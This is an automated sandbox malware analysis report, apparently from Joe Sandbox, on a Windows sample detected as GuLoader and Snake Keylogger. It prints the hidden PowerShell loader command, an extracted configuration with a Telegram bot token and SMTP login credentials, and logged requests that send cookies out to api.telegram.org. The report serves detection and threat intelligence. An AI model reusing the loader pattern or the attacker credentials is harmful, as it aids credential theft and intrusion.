Edit tour

Windows Analysis Report
000027_A-000032.exe

Overview

General Information

Sample name:	000027_A-000032.exe
Analysis ID:	1618976
MD5:	e9fe3937a3a7c10e6a7554f24deea7b0
SHA1:	2a4159954b099847b09ecf3c9a5d874135cc00c0
SHA256:	550578efc3220ae7a5c318a0c6f54bfe1bcb48d07a9721851fb383f61bb14996
Infos:

Detection

GuLoader, Snake Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Early bird code injection technique detected

Found malware configuration

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected GuLoader

Yara detected Snake Keylogger

Yara detected Telegram RAT

Found suspicious powershell code related to unpacking or dynamic code loading

Hides threads from debuggers

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Powershell drops PE file

Queues an APC in another process (thread injection)

Suspicious powershell command line found

Tries to detect the country of the analysis system (by using the IP)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Writes to foreign memory regions

Abnormal high CPU Usage

Adds / modifies Windows certificates

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sigma detected: Msiexec Initiated Connection

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Suspicious Outbound SMTP Connections

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses SMTP (mail sending)

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

000027_A-000032.exe (PID: 6192 cmdline: "C:\Users\user\Desktop\000027_A-000032.exe" MD5: E9FE3937A3A7C10E6A7554F24DEEA7B0)

powershell.exe (PID: 6384 cmdline: powershell.exe -windowstyle hidden "$Peptidases=Get-Content -Raw 'C:\Users\user\AppData\Roaming\toytown\comminuate\segregerer\Jazzmusikers.Cam';$Inkorporerer=$Peptidases.SubString(55039,3);.$Inkorporerer($Peptidases)" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

msiexec.exe (PID: 6404 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot7855907741:AAE8geAKHsbOjUTKKIp5xQcpPo7PZ41e12I/sendMessage"}

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Username": "infinity@ndovumotor.com", "Password": "infinityking1234", "Host": "mail.ndovumotor.com", "Port": "587", "Token": "7855907741:AAE8geAKHsbOjUTKKIp5xQcpPo7PZ41e12I", "Chat_id": "5039346757", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000006.00000002.2915272738.0000000022AA7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000006.00000002.2915272738.00000000229A1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000001.00000002.2336215560.0000000008F9D000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: msiexec.exe PID: 6404	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: msiexec.exe PID: 6404	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security

Sigma Signatures

System Summary

Sigma detected: Msiexec Initiated Connection

Source: Network Connection

Author: frack113: Data: DestinationIp: 142.250.186.46, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 6404, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49799

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Source: File created

Author: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6384, TargetFilename: C:\Users\user\AppData\Roaming\toytown\comminuate\segregerer\Igaar\000027_A-000032.exe

Sigma detected: Suspicious Outbound SMTP Connections

Source: Network Connection

Author: frack113: Data: DestinationIp: 199.188.200.194, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 6404, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 50025

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Peptidases=Get-Content -Raw 'C:\Users\user\AppData\Roaming\toytown\comminuate\segregerer\Jazzmusikers.Cam';$Inkorporerer=$Peptidases.SubString(55039,3);.$Inkorporerer($Peptidases)", CommandLine: powershell.exe -windowstyle hidden "$Peptidases=Get-Content -Raw 'C:\Users\user\AppData\Roaming\toytown\comminuate\segregerer\Jazzmusikers.Cam';$Inkorporerer=$Peptidases.SubString(55039,3);.$Inkorporerer($Peptidases)", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\000027_A-000032.exe", ParentImage: C:\Users\user\Desktop\000027_A-000032.exe, ParentProcessId: 6192, ParentProcessName: 000027_A-000032.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Peptidases=Get-Content -Raw 'C:\Users\user\AppData\Roaming\toytown\comminuate\segregerer\Jazzmusikers.Cam';$Inkorporerer=$Peptidases.SubString(55039,3);.$Inkorporerer($Peptidases)", ProcessId: 6384, ProcessName: powershell.exe

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-19T11:43:25.843288+0100	2803305	3	Unknown Traffic	192.168.2.4	49853	104.21.16.1	443	TCP
2025-02-19T11:43:28.014386+0100	2803305	3	Unknown Traffic	192.168.2.4	49868	104.21.16.1	443	TCP
2025-02-19T11:43:43.550939+0100	2803305	3	Unknown Traffic	192.168.2.4	49977	104.21.16.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-19T11:43:23.863507+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49832	193.122.130.0	80	TCP
2025-02-19T11:43:25.285379+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49832	193.122.130.0	80	TCP
2025-02-19T11:43:26.363707+0100	2803274	2	Potentially Bad Traffic	192.168.2.4	49855	193.122.130.0	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-19T11:43:18.617519+0100	2803270	2	Potentially Bad Traffic	192.168.2.4	49799	142.250.186.46	443	TCP

Joe Security ANOMALY Telegram Send File

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-19T11:43:57.613562+0100	1810008	1	Potentially Bad Traffic	192.168.2.4	50027	149.154.167.220	443	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-02-19T11:43:44.468952+0100	1810007	1	Potentially Bad Traffic	192.168.2.4	49983	149.154.167.220	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Found malware configuration

Source: 00000006.00000002.2915272738.00000000229A1000.00000004.00000800.00020000.00000000.sdmp	Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Username": "infinity@ndovumotor.com", "Password": "infinityking1234", "Host": "mail.ndovumotor.com", "Port": "587", "Token": "7855907741:AAE8geAKHsbOjUTKKIp5xQcpPo7PZ41e12I", "Chat_id": "5039346757", "Version": "4.4"}
Source: msiexec.exe.6404.6.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7855907741:AAE8geAKHsbOjUTKKIp5xQcpPo7PZ41e12I/sendMessage"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\toytown\comminuate\segregerer\Igaar\000027_A-000032.exe

ReversingLabs: Detection: 45%

Multi AV Scanner detection for submitted file

Source: 000027_A-000032.exe	Virustotal: Detection: 40%			Perma Link
Source: 000027_A-000032.exe	ReversingLabs: Detection: 45%

Joe Sandbox ML detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 98.1% probability

Location Tracking

Tries to detect the country of the analysis system (by using the IP)

Source: unknown

DNS query: name: reallyfreegeoip.org

Source: 000027_A-000032.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49843 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 192.168.2.4:49880 -> 104.21.16.1:443 version: TLS 1.0

Source: unknown	HTTPS traffic detected: 142.250.186.46:443 -> 192.168.2.4:49799 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.16.193:443 -> 192.168.2.4:49810 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49983 version: TLS 1.2

Source: 000027_A-000032.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdb source: powershell.exe, 00000001.00000002.2329786451.0000000006F5A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.Core.pdb= source: powershell.exe, 00000001.00000002.2324205397.0000000000404000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb5 source: powershell.exe, 00000001.00000002.2329786451.0000000006F5A000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.Core.pdbs@ source: powershell.exe, 00000001.00000002.2329786451.0000000006F5A000.00000004.00000020.00020000.00000000.sdmp

Source: C:\Users\user\Desktop\000027_A-000032.exe	Code function: 0_2_00406167 FindFirstFileA,FindClose,	0_2_00406167
Source: C:\Users\user\Desktop\000027_A-000032.exe	Code function: 0_2_00405705 CloseHandle,GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	0_2_00405705
Source: C:\Users\user\Desktop\000027_A-000032.exe	Code function: 0_2_00402688 FindFirstFileA,	0_2_00402688

Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 00BFF45Dh	6_2_00BFF29B
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 00BFF45Dh	6_2_00BFF4AC
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 00BFF45Dh	6_2_00BFF52F
Source: C:\Windows\SysWOW64\msiexec.exe	Code function: 4x nop then jmp 00BFFC19h	6_2_00BFF961

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.4:49983 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.4:50027 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic

TCP traffic: 192.168.2.4:50025 -> 199.188.200.194:587

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:116938%0D%0ADate%20and%20Time:%2020/02/2025%20/%2005:05:01%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20116938%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7855907741:AAE8geAKHsbOjUTKKIp5xQcpPo7PZ41e12I/sendDocument?chat_id=5039346757&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd51ed5ac3d78cHost: api.telegram.orgContent-Length: 7046Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 104.21.16.1 104.21.16.1
Source: Joe Sandbox View	IP Address: 104.21.16.1 104.21.16.1
Source: Joe Sandbox View	IP Address: 193.122.130.0 193.122.130.0

Source: Joe Sandbox View

ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49832 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.4:49855 -> 193.122.130.0:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49853 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:49799 -> 142.250.186.46:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49868 -> 104.21.16.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.4:49977 -> 104.21.16.1:443

Source: global traffic

TCP traffic: 192.168.2.4:50025 -> 199.188.200.194:587

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gMrUkPglcluqU0V9ndhQKIrnUj84qLTS HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1gMrUkPglcluqU0V9ndhQKIrnUj84qLTS&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown	HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49843 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 192.168.2.4:49880 -> 104.21.16.1:443 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /uc?export=download&id=1gMrUkPglcluqU0V9ndhQKIrnUj84qLTS HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /download?id=1gMrUkPglcluqU0V9ndhQKIrnUj84qLTS&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:116938%0D%0ADate%20and%20Time:%2020/02/2025%20/%2005:05:01%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20116938%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: msiexec.exe, 00000006.00000003.2357192914.000000000700F000.00000004.00000020.00020000.00000000.sdmp

String found in binary or memory: *.google.com*.appengine.google.com*.bdn.dev*.origin-test.bdn.dev*.cloud.google.com*.crowdsource.google.com*.datacompute.google.com*.google.ca*.google.cl*.google.co.in*.google.co.jp*.google.co.uk*.google.com.ar*.google.com.au*.google.com.br*.google.com.co*.google.com.mx*.google.com.tr*.google.com.vn*.google.de*.google.es*.google.fr*.google.hu*.google.it*.google.nl*.google.pl*.google.pt*.googleapis.cn*.googlevideo.com*.gstatic.cn*.gstatic-cn.comgooglecnapps.cn*.googlecnapps.cngoogleapps-cn.com*.googleapps-cn.comgkecnapps.cn*.gkecnapps.cngoogledownloads.cn*.googledownloads.cnrecaptcha.net.cn*.recaptcha.net.cnrecaptcha-cn.net*.recaptcha-cn.netwidevine.cn*.widevine.cnampproject.org.cn*.ampproject.org.cnampproject.net.cn*.ampproject.net.cngoogle-analytics-cn.com*.google-analytics-cn.comgoogleadservices-cn.com*.googleadservices-cn.comgooglevads-cn.com*.googlevads-cn.comgoogleapis-cn.com*.googleapis-cn.comgoogleoptimize-cn.com*.googleoptimize-cn.comdoubleclick-cn.net*.doubleclick-cn.net*.fls.doubleclick-cn.net*.g.doubleclick-cn.netdoubleclick.cn*.doubleclick.cn*.fls.doubleclick.cn*.g.doubleclick.cndartsearch-cn.net*.dartsearch-cn.netgoogletraveladservices-cn.com*.googletraveladservices-cn.comgoogletagservices-cn.com*.googletagservices-cn.comgoogletagmanager-cn.com*.googletagmanager-cn.comgooglesyndication-cn.com*.googlesyndication-cn.com*.safeframe.googlesyndication-cn.comapp-measurement-cn.com*.app-measurement-cn.comgvt1-cn.com*.gvt1-cn.comgvt2-cn.com*.gvt2-cn.com2mdn-cn.net*.2mdn-cn.netgoogleflights-cn.net*.googleflights-cn.netadmob-cn.com*.admob-cn.comgooglesandbox-cn.com*.googlesandbox-cn.com*.safenup.googlesandbox-cn.com*.gstatic.com*.metric.gstatic.com*.gvt1.com*.gcpcdn.gvt1.com*.gvt2.com*.gcp.gvt2.com*.url.google.com*.youtube-nocookie.com*.ytimg.comandroid.com*.android.com*.flash.android.comg.cn*.g.cng.co*.g.cogoo.glwww.goo.glgoogle-analytics.com*.google-analytics.comgoogle.comgooglecommerce.com*.googlecommerce.comggpht.cn*.ggpht.cnurchin.com*.urchin.comyoutu.beyoutube.com*.youtube.commusic.youtube.com*.music.youtube.comyoutubeeducation.com*.youtubeeducation.comyoutubekids.com*.youtubekids.comyt.be*.yt.beandroid.clients.google.com*.android.google.cn*.chrome.google.cn*.developers.google.cnz equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: drive.google.com
Source: global traffic	DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: mail.ndovumotor.com

Source: unknown

HTTP traffic detected: POST /bot7855907741:AAE8geAKHsbOjUTKKIp5xQcpPo7PZ41e12I/sendDocument?chat_id=5039346757&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd51ed5ac3d78cHost: api.telegram.orgContent-Length: 7046Connection: Keep-Alive

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Wed, 19 Feb 2025 10:43:44 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

